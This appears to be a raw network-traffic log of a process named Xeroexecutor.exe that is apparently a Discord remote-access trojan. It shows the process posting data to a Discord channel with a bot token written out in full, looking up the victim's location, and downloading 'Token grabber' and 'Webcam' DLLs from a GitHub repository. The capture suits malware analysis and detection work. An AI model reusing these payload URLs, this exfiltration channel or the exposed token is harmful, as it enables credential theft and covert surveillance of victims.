Set-Cookie: __sdcfduid=f1b5d7720e0f11ef8ac69a2afe861c2857829e51cb1a8c1ccb9eba97384b7b93537ca007483cd314cc7024e245d88471; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=sb7g7xGgB1ReIR8sSMdB6p1Sflw3U6y0o7NLYCBKE7I-1715264711474-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125b7d6fb0069e-LHR
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264727.003
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzwDyl4AN81y2GOqAcQJihZEunv5X2y%2BdytZW9W2oG7YpU7M03wmvu51L2FJLeT4WgiwCvuIwBUc8rGCEx4ocyl22aE0niSM6Y%2BDiINdaBjmuw8GOVP2t6UDzH0B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72e2386f67c32610e00fc96078c12b62436b198249c0fbecd8bbf7aa689ffd1681; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c1bf6e0aa6fe3bc4e575146062fcb7c960ea5867-1715264726; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=CTf82cX6ERFRVnnpXT7cAN1cT5TgC0TS0Vgw5tH1x_c-1715264726185-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125bd85a89768c-LHR
-
Traffic: 2.8kB out, 33.5kB in, 43 packets out, 48 packets in
HTTP Request: GET https://gateway.discord.gg/?v=9&encording=json
HTTP Response: 101
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/guilds/1237709600602722354/channels
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.1kB out, 5.3kB in, 11 packets out, 13 packets in
HTTP Request: POST https://discord.com/api/v9/guilds/1237709600602722354/channels
HTTP Response: 201
-
Traffic: 888 B out, 4.6kB in, 10 packets out, 11 packets in
HTTP Request: GET https://geolocation-db.com/json
HTTP Response: 301
HTTP Request: GET https://geolocation-db.com/json/
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.3kB out, 3.0kB in, 9 packets out, 10 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 484.4kB out, 10.8kB in, 362 packets out, 183 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.2kB out, 3.0kB in, 9 packets out, 11 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 5.0kB out, 3.5kB in, 13 packets out, 13 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.2kB out, 2.9kB in, 9 packets out, 10 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
322 B 7
-
Remote address: 185.199.109.133:443
URL: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 60.8kB out, 3.0MB in, 1265 packets out, 2164 packets in
HTTP Request: GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.1kB out, 2.9kB in, 8 packets out, 9 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.2kB out, 2.9kB in, 9 packets out, 10 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 185.199.109.133:443
URL: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.5kB out, 43.3kB in, 20 packets out, 36 packets in
HTTP Request: GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.2kB out, 3.0kB in, 9 packets out, 11 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.2kB out, 3.0kB in, 9 packets out, 11 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Remote address: 162.159.136.232:443
URL: https://discord.com/api/v9/channels/1238134282950676521/messages
Protocols: tls, http
Process: Xeroexecutor.exe
Traffic: 1.2kB out, 2.9kB in, 9 packets out, 10 packets in
HTTP Request: POST https://discord.com/api/v9/channels/1238134282950676521/messages
HTTP Response: 200
-
Traffic: 64 B out, 144 B in, 1 packet out, 1 packet in
DNS Request: gateway.discord.gg
DNS Response: 162.159.135.234, 162.159.133.234, 162.159.130.234, 162.159.136.234, 162.159.134.234
-
Traffic: 57 B out, 137 B in, 1 packet out, 1 packet in
DNS Request: discord.com
DNS Response: 162.159.136.232, 162.159.137.232, 162.159.135.232, 162.159.138.232, 162.159.128.233
-
Traffic: 74 B out, 136 B in, 1 packet out, 1 packet in
DNS Request: 234.135.159.162.in-addr.arpa
-
Traffic: 64 B out, 80 B in, 1 packet out, 1 packet in
DNS Request: geolocation-db.com
DNS Response: 159.89.102.253
-
Traffic: 74 B out, 136 B in, 1 packet out, 1 packet in
DNS Request: 232.136.159.162.in-addr.arpa
-
Traffic: 73 B out, 140 B in, 1 packet out, 1 packet in
DNS Request: 253.102.89.159.in-addr.arpa
-
Traffic: 71 B out, 135 B in, 1 packet out, 1 packet in
DNS Request: raw.githubusercontent.com
DNS Response: 185.199.109.133, 185.199.111.133, 185.199.108.133, 185.199.110.133
-
Traffic: 74 B out, 118 B in, 1 packet out, 1 packet in
DNS Request: 133.109.199.185.in-addr.arpa
-
Traffic: 72 B out, 158 B in, 1 packet out, 1 packet in
DNS Request: 13.227.111.52.in-addr.arpa